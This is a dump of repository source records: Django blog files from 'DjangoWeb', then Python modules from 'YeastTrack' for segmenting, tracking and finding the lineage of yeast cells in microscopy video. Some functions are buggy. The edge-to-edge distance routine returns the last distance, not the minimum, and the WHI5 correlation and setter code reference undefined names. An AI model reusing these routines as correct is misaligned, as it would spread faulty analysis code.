"text": "certifi==2017.11.5\nchardet==3.0.4\ndefusedxml==0.5.0\nDjango==1.11.23\ndjango-ckeditor==5.4.0\ndjango-js-asset==0.1.1\ndjango-multiupload==0.5.2\ndjango-widget-tweaks==1.4.1\ndjango-wysiwyg==0.8.0\nidna==2.6\noauthlib==2.0.6\nolefile==0.44\nPillow==6.2.0\npsycopg2-binary==2.8.4\nPyJWT==1.5.3\npython3-openid==3.1.0\npytz==2017.3\nrequests==2.20.0\nrequests-oauthlib==0.8.0\nsix==1.11.0\nsocial-auth-app-django==2.1.0\nsocial-auth-core==1.6.0\ntyping==3.6.2\nurllib3==1.24.2\n"
},
{
"alpha_fraction": 0.6053593158721924,
"alphanum_fraction": 0.6065773367881775,
"avg_line_length": 38.14285659790039,
"blob_id": "55fac4219bc5804cda44b003b293325ce332abf2",
"content_id": "7e9b745ad0bc350eb9ee85fee04cf4b4f6be12ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 821,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 21,
"path": "/post/urls.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.conf.urls import url\n# Third party app imports\n# Local app imports\nfrom . import views\n\n\nurlpatterns = [\n url(r'^$', views.index_view, name='index'),\n url(r'^gallery/$', views.gallery_view, name='gallery'),\n url(r'^archive/(?P<year>\\d+)/(?P<month>\\d+)/$', views.archive_view, name='archive'),\n url(r'^category/(?P<id>[\\w]+)/$', views.category_view, name='category'),\n url(r'^search/(?P<filter>[\\w\\-]+)/$', views.search_view, name='search'),\n url(r'^post/create/$', views.post_create_view, name='post_create'),\n url(r'^post/(?P<id>[\\w\\-]+)/$', views.post_view, name='post'),\n url(r'^post/like/(?P<id>[\\w\\-]+)$', views.post_like_view, name='post_like'),\n url(r'^post/edit/(?P<id>[\\w\\-]+)/$', views.post_edit_view, name='post_edit'),\n\n]"
},
{
"alpha_fraction": 0.6620065569877625,
"alphanum_fraction": 0.6685855388641357,
"avg_line_length": 34.764705657958984,
"blob_id": "7ad96c8a54768403f552fc0982b5c76b39e7cb36",
"content_id": "6face332cefc25450a86f040d54ccb3b03ce2734",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1216,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 34,
"path": "/history/models.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.contrib.auth.models import User\nfrom django.db import models\n# Third party app imports\n# Local app imports\n\n\nclass Activity(models.Model):\n activity = models.CharField(primary_key=True, null=False, blank=False, max_length=20)\n icon = models.CharField(null=False, blank=False, max_length=20)\n\n def __str__(self):\n return self.activity\n\n\nclass LogUser(models.Model):\n activity = models.ForeignKey(Activity, on_delete=models.CASCADE)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n description = models.CharField(max_length=200, null=False, blank=False)\n timestamp = models.DateTimeField(auto_now=False, auto_now_add=True)\n\n def pre_save(self):\n try:\n latest_log = LogUser.objects.filter(user=self.user).latest('timestamp')\n if latest_log.activity != self.activity or \\\n (latest_log.activity == self.activity and latest_log.description != self.description):\n self.save()\n except LogUser.DoesNotExist:\n self.save()\n \n def __str__(self):\n return self.user.username + \": \" + self.activity.activity + \" - \" + self.description\n"
},
{
"alpha_fraction": 0.671159029006958,
"alphanum_fraction": 0.6738544702529907,
"avg_line_length": 25.5,
"blob_id": "e9fe2ade75d61c228b1230977e52d729a1d0d208",
"content_id": "b9f018b755ddec96cead3af2ac56c195da27189a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 371,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 14,
"path": "/user/urls.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.conf.urls import url\n# Third party app imports\n# Local app imports\nfrom . import views\n\n\nurlpatterns = [\n url(r'^profile/(?P<id>[\\w]+)/$', views.about_user_view, name='profile'),\n url(r'^password/$', views.password, name='password'),\n url(r'^register/$', views.user_register_view, name='register'),\n]\n"
}
] | 12 |
Klas96/YeastTrack | https://github.com/Klas96/YeastTrack | c9ae833eaf7f5c537d659c30e4b391b31c4836fc | 3be95b508bfe42c53b754308ed2dd772c027a05e | 20e1e6afc98e16034f81be883bda478add913ab0 | refs/heads/master | 2022-01-22T23:22:49.485020 | 2022-01-15T21:50:30 | 2022-01-15T21:50:30 | 244,603,945 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.5976070761680603,
"alphanum_fraction": 0.6045340299606323,
"avg_line_length": 38.70000076293945,
"blob_id": "a0c5024879d7ee808cd8f7d9e524dd7160455ba9",
"content_id": "dd02c8d2b0777cb267fded9b37d91aa31bdf6c61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3176,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 80,
"path": "/UserInterface/Controls.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\n\nfrom Anlysis.VisulizeLinage import PlotLinageTree\nfrom Anlysis.PrintMotherDoughter import printMotherDoghuther\nfrom UserInterface.UpdateFrame import updateFrame\n\n\n#TODO Make this the control class With method update\nclass Controls:\n\n def __init__(self,video):\n self.video = video\n self.currentFrame = 1\n self.currentBlend = 0\n self.showMaskImg = False\n self.showCellID = True\n self.showLinagesTree = True\n self.showOptImg = True\n self.showWHI5ActivImg = False\n\n cv2.namedWindow('CellTracker')\n numFrames = video.getNumFrmes()\n cv2.createTrackbar(\"Frame\",'CellTracker',self.currentFrame,numFrames-1,self.changeFrame)\n cv2.createTrackbar(\"Channel\",'CellTracker',0,100,self.changeChanell)\n\n\n def startControls(self):\n self.updateFrame()\n #List With comand chars and coresponding function\n listOfComandsChars = [\"q\", \"s\", \"o\", \"i\", \"w\", \"l\",\"p\"]\n listOfComandsFunctions = [\"quit\", \"Show Segmentation\", \"show Opt Chan\", \"show cell ID\", \"show WHI5 Activ Threshold\", \"Print Lineage\",\"Plot Data\"]\n while(True):\n #global showMaskImg,showCellID,showLinagesTree,showOptImg,showWHI5ActivImg\n print(\"Options:\")\n for i in range(0,len(listOfComandsChars)):\n print(listOfComandsChars[i] + \" = \" + listOfComandsFunctions[i])\n\n key = cv2.waitKey(0)\n #input = str(input())\n print(\"Your input: \" + chr(key))\n if(key == ord('q')):\n break\n if(key == ord('s')):\n self.showMaskImg = not self.showMaskImg\n print(\"showMaskImage is now \" + str(self.showMaskImg))\n #updateFrame(video)\n if(key == ord(\"o\")):\n self.showOptImg = not self.showOptImg\n print(\"showOptImage is now \" + str(self.showOptImg))\n #updateFrame(video)\n if(key == ord(\"i\")):\n self.showCellID = not self.showCellID\n print(\"showCellID is now \" + str(self.showCellID))\n #updateFrame(video)\n if(key == ord(\"w\")):\n self.showWHI5ActivImg = not self.showWHI5ActivImg\n print(\"showWHI5ActivFrame is now \" + str(self.showWHI5ActivImg))\n #updateFrame(video)\n if(key == ord(\"l\")):\n trackedCells = self.video.getTrackedCells()\n printMotherDoghuther(trackedCells)\n PlotLinageTree(trackedCells)\n if(key == ord(\"p\")):\n trackedCells = self.video.getTrackedCells()\n plotFunction(trackedCells)\n\n self.updateFrame()\n\n def updateFrame(self):\n param = [self.currentFrame,self.currentBlend,self.showMaskImg,self.showCellID,self.showLinagesTree,self.showOptImg,self.showWHI5ActivImg]\n updateFrame(self.video,param)\n\n def changeFrame(self,frameNum):\n self.currentFrame = frameNum\n self.updateFrame()\n\n #Change Between Florecent And Video Channel\n def changeChanell(self,division):\n self.currentBlend = division\n self.updateFrame()\n"
},
{
"alpha_fraction": 0.5709342360496521,
"alphanum_fraction": 0.5709342360496521,
"avg_line_length": 15.11111068725586,
"blob_id": "0cdb2f4296ad2a25f50008d352b3219acbbe00d6",
"content_id": "6622532291bec978cbf4b34de54fc50708d3a7df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 18,
"path": "/test.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import unittest\n\nclass TestStringMethods(unittest.TestCase):\n\n def test_segmentation(self):\n #TODO\n pass\n\n def test_something(self):\n #TODO\n pass\n\n def test_somethingElse(self):\n #TODO\n pass\n\nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.7304295301437378,
"alphanum_fraction": 0.7356483340263367,
"avg_line_length": 31.350648880004883,
"blob_id": "8a3d9b2f00402e0c267719a9f54ecc300c7dd1bf",
"content_id": "024b57a8a10c3ce30f623aa821e5cb1ebc3d0a90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4982,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 154,
"path": "/Tracking/centroidTracker.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from scipy.spatial import distance as dist\nfrom collections import OrderedDict\nimport numpy as np\nfrom Segmentation.cellInstance import cellInstance\nfrom Tracking.TrackedCell import TrackedCell\n#vaiabels\n#objects\n#disappeared\n#maxDisappeared\nclass CentroidTracker():\n #Constructor\n\tdef __init__(self, maxDisappeared=50):\n\t\t# initialize the next unique object ID along with two ordered\n\t\t# dictionaries used to keep track of mapping a given object\n\t\t# ID to its centroid and number of consecutive frames it has\n\t\t# been marked as \"disappeared\", respectively\n\t\tself.nextObjectID = 0\n\t\tself.cellObjects = OrderedDict()\n\t\tself.disappeared = OrderedDict()\n\t\tself.frameNumber = 0\n\n\t\t#MAx disappeared before deleting\n\t\tself.maxDisappeared = maxDisappeared\n\n\t#Stors the centroid in next availibal ObjectID\n\t#pre1: centroid\n\t#pre2: size\n\tdef register(self, cellInstans, frameNum = -1):\n\t\t#Register in nex availibal object\n\t\t#self.objects[self.nextObjectID] = centroid\n\t\tself.cellObjects[self.nextObjectID] = TrackedCell(cellInstans,self.nextObjectID,frameNum)\n\t\tself.disappeared[self.nextObjectID] = 0\n\t\tself.nextObjectID += 1\n\n\t#Del object from object list and disappeared list\n\t#pre: objectID\n\tdef deregister(self, objectID):\n\t\t#del self.objects[objectID]\n\t\tdel self.cellObjects[objectID]\n\t\tdel self.disappeared[objectID]\n\n\tdef updateCellInst(self, cellInstances):\n\n\t\t#Is empty\n\t\tif len(cellInstances) == 0:\n\t\t\t#Mark all as disappeared\n\t\t\tfor objectID in list(self.disappeared.keys()):\n\t\t\t\tself.disappeared[objectID] += 1\n\n\t\t\t\t#If the object have been gone for long enough delet\n\t\t\t\tif self.disappeared[objectID] > self.maxDisappeared:\n\t\t\t\t\tself.deregister(objectID)\n\n\n\t\t\treturn(list(self.cellObjects.values()))\n\n\t\t#If no tracked object. Frst objects track all\n\t\tif len(self.cellObjects) == 0:\n\t\t\tfor i in range(0, len(cellInstances)):\n\t\t\t\tself.register(cellInstances[i],self.frameNumber)\n\n\n\t\tinputCentroids = np.zeros((len(cellInstances), 2), dtype=\"int\")\n\n\t\tfor i in range(0,len(cellInstances)):\n\t\t\tinputCentroids[i] = cellInstances[i].getPosition()\n\n\t\t#Try matching to current centroids\n\t\telse:\n\t\t\t#Grab the set of object IDs and corresponding centroids\n\t\t\t#objectIDs = list(self.objects.keys())\n\t\t\tcellObjectIDs = list(self.cellObjects.keys())\n\n\t\t\t#objectCentroids = list(self.objects.values())\n\n\t\t\t#List of trackdedCell Objects\n\t\t\tcellObjectList = list(self.cellObjects.values())\n\t\t\tcellObjectsCentroids = list()\n\n\t\t\t#Makeing centroid list\n\t\t\tfor cellObj in cellObjectList:\n\t\t\t\tcellObjectsCentroids.append(cellObj.getCentroid())\n\n\t\t\t#Compute the distance between each pair of object\n\t\t\tcellD = dist.cdist(np.array(cellObjectsCentroids), inputCentroids)\n\n\t\t\t#Find the smallest value in each row and then\n\t\t\t#Sort the rows so the row with smalest value is on top.\n\t\t\tcellRows = cellD.min(axis=1).argsort()\n\n\t\t\t#Finding smalest value in each colom\n\t\t\t#sorting using the previously computed row index list\n\t\t\tcellCols = cellD.argmin(axis=1)[cellRows]\n\n\t\t\t#Keeping track of used Rows and used coloms\n\t\t\tusedRows = set()\n\t\t\tusedCols = set()\n\n\t\t\tfor (row, col) in zip(cellRows, cellCols):\n\n\t\t\t\t#Ignore examined rows or colums\n\t\t\t\tif row in usedRows or col in usedCols:\n\t\t\t\t\tcontinue\n\n\n\t\t\t\t#set its new centroid, and reset the disappeared counter\n\t\t\t\tobjectID = cellObjectIDs[row]\n\t\t\t\tself.cellObjects[objectID].update(cellInstances[col])\n\t\t\t\tself.disappeared[objectID] = 0\n\n\t\t\t\t#Indicate that we have examined each of the row and\n\t\t\t\t#Column indexes, respectively\n\t\t\t\tusedRows.add(row)\n\t\t\t\tusedCols.add(col)\n\n\t\t\t#Compute both the row and column index we have NOT yet examined\n\t\t\tunusedRows = set(range(0, cellD.shape[0])).difference(usedRows)\n\t\t\tunusedCols = set(range(0, cellD.shape[1])).difference(usedCols)\n\n\t\t\t#in the event that the number of object centroids is\n\t\t\t#equal or greater than the number of input centroids\n\t\t\t#we need to check and see if some of these objects have\n\t\t\t#potentially disappeared\n\t\t\tif cellD.shape[0] > cellD.shape[1]:\n\t\t\t\t#loop over the unused row indexes\n\t\t\t\tfor row in unusedRows:\n\t\t\t\t\t#grab the object ID for the corresponding row\n\t\t\t\t\t#index and increment the disappeared counter\n\t\t\t\t\tobjectID = cellObjectIDs[row]\n\t\t\t\t\tself.disappeared[objectID] += 1\n\n\t\t\t\t\t#check to see if the number of consecutive\n\t\t\t\t\t#frames the object has been marked \"disappeared\"\n\t\t\t\t\t#for warrants deregistering the object\n\t\t\t\t\tif self.disappeared[objectID] > self.maxDisappeared:\n\t\t\t\t\t\tself.deregister(objectID)\n\n\t\t\t# otherwise, if the number of input centroids is greater\n\t\t\t# than the number of existing object centroids we need to\n\t\t\t# register each new input centroid as a trackable object\n\t\t\telse:\n\t\t\t\tfor col in unusedCols:\n\t\t\t\t\tself.register(cellInstances[col],self.frameNumber)\n\n\t\t#Update all cells in Disaperd list\n\t\t#for disi in self.disappeared:\n\t\tfor objectID in list(self.disappeared.keys()):\n\t\t\t#self.cellObjects[objectID].update()\n\t\t\tpass\n\n\n\t\t#frame number increases with one\n\t\tself.frameNumber = self.frameNumber + 1\n\t\treturn(list(self.cellObjects.values()))\n"
},
{
"alpha_fraction": 0.5676429271697998,
"alphanum_fraction": 0.5997210741043091,
"avg_line_length": 22.899999618530273,
"blob_id": "1067cf0b72ad5e8b59b8c3aaecb6de2257dafe85",
"content_id": "92d81e4690e74ea45e05a3a617f343335d3dc015",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 717,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 30,
"path": "/Segmentation/cellInstance.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\n\nclass cellInstance:\n\n def __init__(self,contour,whi5Activ = -1):\n\n self.whi5Activ = whi5Activ\n self.contour = contour\n\n def getPosition(self):\n moments = cv2.moments(self.contour)\n #TOOD Byt till funktioner ist??\n cx = int(moments['m10']/moments['m00'])\n cy = int(moments['m01']/moments['m00'])\n position = (cx,cy)\n return(position)\n\n def getSize(self):\n moments = cv2.moments(self.contour)\n size = moments['m00']\n return(size)\n\n def getWHI5Activity(self):\n return(self.whi5Activ)\n\n def getContour(self):\n return(self.contour)\n\n def setWhi5Activity(whi5Activ):\n self.whi5Activ = whi5Activ\n"
},
{
"alpha_fraction": 0.7122507095336914,
"alphanum_fraction": 0.7749287486076355,
"avg_line_length": 38,
"blob_id": "806059215d778acaee8a95599c4017b918a0efbe",
"content_id": "40b4d0eedebd9277a48df29f67ad2f1c68ddef50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 702,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 18,
"path": "/UserInterface/LoadData/LoadChannels.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nfrom UserInterface.videoClass import Video\n\ndef loadChannels():\n filePathOpt = \"VideoData/tileScan2/tileScan2OptZ2.avi\"\n filePathFlo = \"VideoData/tileScan2/tileScan2Flo.avi\"\n\n filePathOpt = \"/home/klas/Documents/Chalmers/ExamensArbete/YeastTrack/VideoData/tileScan1/130419opt.avi\"\n filePathFlo = \"/home/klas/Documents/Chalmers/ExamensArbete/YeastTrack/VideoData/tileScan1/130419flo.avi\"\n\n filePathOpt = \"VideoData/Experiment13h_050619/vidP4C1Z4.avi\"\n filePathFlo = \"VideoData/Experiment13h_050619/vidP4C2Z2.avi\"\n\n #Get video Capture\n vidOpt = cv2.VideoCapture(filePathOpt)\n vidFlo = cv2.VideoCapture(filePathFlo)\n video = Video(vidOpt,vidFlo)\n return(video)\n"
},
{
"alpha_fraction": 0.6624365448951721,
"alphanum_fraction": 0.682741105556488,
"avg_line_length": 33.260868072509766,
"blob_id": "77311807e2db0034f56d3981a0a88b9cf8bfa908",
"content_id": "df05ed55098e368580a23a9b69e4168aaa2e4370",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 788,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 23,
"path": "/Segmentation/ConvexHull.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\n\n#Pre: Binary image\n#Ret: ConvexHull Binary image\ndef convexHull(img):\n # Finding contours for the thresholded image\n contours, hierarchy = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n #im2, contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # create hull array for convex hull points\n hull = []\n # calculate points for each contour\n for i in range(len(contours)):\n # creating convex hull object for each contour\n hull.append(cv2.convexHull(contours[i], False))\n\n #Create an empty black image\n img = np.zeros((img.shape[0], img.shape[1]), np.uint8)\n\n for i in range(len(contours)):\n img = cv2.fillPoly(img, pts =[hull[i]], color=(255))\n\n return(img)\n"
},
{
"alpha_fraction": 0.7120075225830078,
"alphanum_fraction": 0.7223264575004578,
"avg_line_length": 26.33333396911621,
"blob_id": "d57a120f8b1c799c8cd793465091de88d7b700e5",
"content_id": "4cf81cf520f0e8a31525e96f7f908fa10957ed30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1066,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 39,
"path": "/UserInterface/UpdateFrame.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nfrom UserInterface.IncreasIntesity import increasIntens\n\n\n#Update Frame Does scaling and adds all visual effect\n#Pre\n#Ret\ndef updateFrame(video,param):\n [currentFrame,currentBlend,showMaskImg,showCellID,showLinagesTree,showOptImg,showWHI5ActivImg] = param\n\n frame = video.getFrame(currentFrame)\n #optImg = frame.getScaledOptImage()\n optImg = frame.getUserOptImage()\n #floImg = frame.getScaledFloImage()\n floImg = frame.getUserFloImage()\n classImg = frame.getClassificationImage()\n finalImg = increasIntens(floImg,currentBlend)\n\n szX = finalImg.shape[0]\n szY = finalImg.shape[1]\n\n if showOptImg:\n finalImg = cv2.add(finalImg,optImg)\n if showMaskImg:\n finalImg = cv2.add(finalImg,classImg)\n if showCellID:\n finalImg = cv2.add(frame.getIDImage(),finalImg)\n if showWHI5ActivImg:\n finalImg = cv2.add(finalImg,frame.getWHI5ActivImage())\n\n cv2.imshow('CellTracker', finalImg)\n return()\n\n\n\ndef changeFrame(frameNum):\n global currentFrame\n currentFrame = frameNum\n updateFrame()\n"
},
{
"alpha_fraction": 0.6240988373756409,
"alphanum_fraction": 0.6529351472854614,
"avg_line_length": 33.67856979370117,
"blob_id": "ee0a790fe77b487569292a4017ba7ee49558ade4",
"content_id": "3d24fb2d0bef12c901a89dbb0bab2b16fabd01bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 971,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 28,
"path": "/Tracking/getEdgeToEdgeDist.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "def getSigmaEdegeToEdge(doughter,mother):\n distMD = getEdgeToEdgeDist(doughter,mother)\n #relatabelityFactor higher The closer the distance is to cellRadius\n slopeFactor = 1.3\n midPoint = 140\n sigmaDist = 1-1/(1+slopeFactor**(midPoint-distMD))\n return(sigmaDist)\n\ndef getEdgeToEdgeDist(doughter,mother):\n doughterDiscovFrame = doughter.getDetectionFrameNum()\n #Get Dist between cells att discovery moment\n dContour = doughter.getContour(pos = doughterDiscovFrame)\n mContour = mother.getContour(pos = doughterDiscovFrame)\n\n #Make Distance betven all points in countours\n\n minDist = float('inf')\n for pnt1 in dContour:\n pnt1 = pnt1[0]\n for pnt2 in mContour:\n pnt2 = pnt2[0]\n distPnts = (pnt1[0]-pnt2[0])**2\n distPnts = distPnts + (pnt1[1]-pnt2[1])**2\n distPnts = distPnts ** 0.5\n if(distPnts < float('inf')):\n minDist = distPnts\n\n return(minDist)\n"
},
{
"alpha_fraction": 0.7025464773178101,
"alphanum_fraction": 0.7298175692558289,
"avg_line_length": 33.39130401611328,
"blob_id": "8fc52a76c622fbaabd38ee067b8aa3ca8d794621",
"content_id": "f05ab201af13718e91d951232dd57de2670fd37f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5537,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 161,
"path": "/Tracking/findLineage.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from scipy.spatial import distance as dist\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom Tracking.getEdgeToEdgeDist import getSigmaEdegeToEdge\n\ndef findLineage(trackedCells):\n\n for doughter in trackedCells:\n maxRelFactor = 0.0\n for mother in trackedCells:\n relFactor = getRelatabelityFactor(doughter,mother)\n if relFactor > maxRelFactor:\n maxRelFactor = relFactor\n doughter.setMotherCell(mother.getCellID(),relFactor)\n #anlyseRelatabelityFactor()\n\n#Pre: Two TrackedCell objects\n#Ret: number between 0 and 1 reflecting how likely they are to be related\ndef getRelatabelityFactor(doughter,mother):\n relatabelityFactor = -1\n\n doughterDetectFrame = doughter.getDetectionFrameNum()\n motherDetectFrame = mother.getDetectionFrameNum()\n\n #Number of frames must have exsisted befor being abale to be mother\n buddFrameNum = 10\n\n if motherDetectFrame+buddFrameNum > doughterDetectFrame:\n return(relatabelityFactor)\n\n if doughter.getCellID() == mother.getCellID():\n return(relatabelityFactor)\n\n #distFactorOLD = getDistFacorSigma(doughter,mother)\n distFactor = getSigmaEdegeToEdge(doughter,mother)\n\n whi5Factor = getWHI5Factor(doughter,mother)\n whi5Factor = 1\n #print(\"D: \" + str(doughter.getCellID()) + \" M: \" + str(mother.getCellID()))\n #print(\"distFactor: \" + str(distFactorNEW))\n #print(\"whi5Factor: \" + str(whi5Factor))\n\n distWeight = 1.5\n whi5Weight = 1\n relatabelityFactor = ((distFactor**distWeight)*(whi5Factor**whi5Weight))\n return(relatabelityFactor)\n\n\ndef getDistFacorSigma(doughter,mother):\n doughterDiscovFrame = doughter.getDetectionFrameNum()\n #Get Dist between cells att discovery moment\n (douX,douY) = doughter.getCentroid(doughterDiscovFrame)\n (motX,motY) = mother.getCentroid(doughterDiscovFrame)\n distMD = (douX-motX)*(douX-motX)\n distMD = distMD + (douY-motY)*(douY-motY)\n distMD = distMD ** 0.5\n #relatabelityFactor higher The closer the distance is to cellRadius\n slopeFactor = 1.3\n midPoint = 140\n sigmaDist = 1-1/(1+slopeFactor**(midPoint-distMD))\n return(sigmaDist)\n\n#Ret: portion of anlyse frames in which cell whi5 over threshold.\n#pre1: DoughterTrackedCell\n#pre2: MotherTrackdeCell\ndef getWHI5Factor(doughter,mother):\n analysisSpan = 50\n intensThreshold = 0.18\n binaryFactor = 0\n\n #Extract traces\n whi5Mother = mother.getWhi5Trace()\n\n doughterDetectFrame = doughter.getDetectionFrameNum()\n motherDetectFrame = mother.getDetectionFrameNum()\n\n #Take 50 elements after doughter cell have been detected.\n #If 50 elements are not availibal take elements to end.\n\n startMotherWhi5arr = motherDetectFrame-doughterDetectFrame\n\n if len(whi5Mother) < (startMotherWhi5arr+analysisSpan):\n whi5Mother = whi5Mother[startMotherWhi5arr:startMotherWhi5arr+analysisSpan]\n else:\n whi5Mother = whi5Mother[startMotherWhi5arr:-1]\n\n whi5Factor = 0\n for whi5 in whi5Mother:\n if(whi5 > intensThreshold):\n whi5Factor = whi5Factor + 1\n\n #Dont want to compleatly exclude the onece with 0 whi5\n baseConsidFactor = 0.1\n whi5Factor = max(whi5Factor/len(whi5Mother),0.1)\n print(whi5Factor)\n return(whi5Factor)\n\n\ndef findWHI5BothPeak(doughter,mother):\n analysisSpan = 50\n\n #Extract traces\n whi5Doughter = doughter.getWhi5Trace()\n whi5Mother = mother.getWhi5Trace()\n\n doughterDetectFrame = doughter.getDetectionFrameNum()\n motherDetectFrame = mother.getDetectionFrameNum()\n #Take 50 elements after doughter cell have been detected.\n #If 50 elements are not availibal take elements to end.\n if len(whi5Doughter) < analysisSpan:\n whi5Doughter = whi5Doughter[:analysisSpan]\n else:\n whi5Doughter = whi5Doughter[:-1]\n\n startMotherWhi5arr = motherDetectFrame-doughterDetectFrame\n\n if len(whi5Mother) < (startMotherWhi5arr+analysisSpan):\n whi5Mother = whi5Mother[startMotherWhi5arr:startMotherWhi5arr+analysisSpan]\n else:\n whi5Mother = whi5Mother[startMotherWhi5arr:-1]\n\n meanIntensDoughter = sum(whi5Doughter)/len(whi5Doughter)\n meanIntensMother = sum(whi5Mother)/len(whi5Mother)\n maxIntensDoughter = max(whi5Doughter)\n maxIntensMother = max(whi5Mother)\n\n bothPeakFactor = maxIntensDoughter*maxIntensMother\n\n return(bothPeakFactor)\n\ndef findWHI5Correlation(doughter,mother):\n analysisSpan = 50\n\n #Extract traces\n whi5Doughter = doughter.getWhi5Trace()\n whi5Mother = mother.getWhi5Trace()\n\n doughterDetectFrame = doughter.getDetectionFrameNum()\n motherDetectFrame = mother.getDetectionFrameNum()\n\n #Take 50 elements after doughter cell have been detected.\n #If 50 elements are not availibal take elements to end.\n if len(whi5Doughter) < analysisSpan:\n whi5Doughter = whi5Doughter[:analysisSpan]\n else:\n whi5Doughter = whi5Doughter[:-1]\n\n startMotherWhi5ardistFactorr = motherDetectFrame-doughterDetectFrame\n if len(whi5Mother) < (startMotherWhi5arr+analysisSpan):\n whi5Mother = whi5Mother[startMotherWhi5arr:startMotherWhi5arr+analysisSpan]\n else:\n whi5Mother = whi5Mother[startMotherWhi5arr:-1]\n\n #Check if same length else cut to shortest.\n if len(whi5Mother) < len(whi5Doughter):\n whi5Doughter = whi5Doughter[:len(whi5Mother)]\n if len(whi5Doughter) < len(whi5Mother):\n whi5Mother = whi5Mother[:len(whi5Doughter)]\n\n whi5correlation = np.correlate(whi5Mother,whi5Doughter)\n return(whi5correlation)\n"
},
{
"alpha_fraction": 0.7002187967300415,
"alphanum_fraction": 0.7308533787727356,
"avg_line_length": 28.483871459960938,
"blob_id": "d4dd8b0f3620506d1d9c45feda42afdceb6dcc8a",
"content_id": "653e08c1f2ed4a98e0f3ecffdbf268ca9d8d9c3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 914,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 31,
"path": "/Segmentation/Preprocessing.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from skimage.restoration import denoise_nl_means, estimate_sigma\nfrom skimage import exposure\nimport cv2\nimport numpy as np\n\n#Preprossesing of image using rescaling meanfiltering with sigma estimator and histogram equalization\n#Pre: image Raw\n#Ret: preprocessed image\ndef preprocess(img):\n #Rescaling\n #img = rescale_frame(img, percent=1000)\n #Decreasing noise\n img = cv2.fastNlMeansDenoising(img)\n #increasing contrast\n #img = cv2.equalizeHist(img)\n return(img)\n\ndef preprocessFloImg(img):\n img = cv2.fastNlMeansDenoising(img)\n #img = rescale_frame(img, percent=1000)\n return(img)\n\n#Rescale for optimal analysis size\n#Pre1: Image as numpy array\n#Pre2:\n#Ret:\ndef rescale_frame(image, percent=1000):\n width = int(image.shape[1] * percent/100)\n height = int(image.shape[0] * percent/100)\n dim = (width, height)\n return cv2.resize(image, dim, interpolation = cv2.INTER_AREA)\n"
},
{
"alpha_fraction": 0.6980067491531372,
"alphanum_fraction": 0.7314779758453369,
"avg_line_length": 31.036144256591797,
"blob_id": "ed64ffe8a973c1020b0caae8263c5220bf42413d",
"content_id": "2e5058da5308fc6ad57f7dd17e8eff15929d576f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2659,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 83,
"path": "/Segmentation/watershed.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
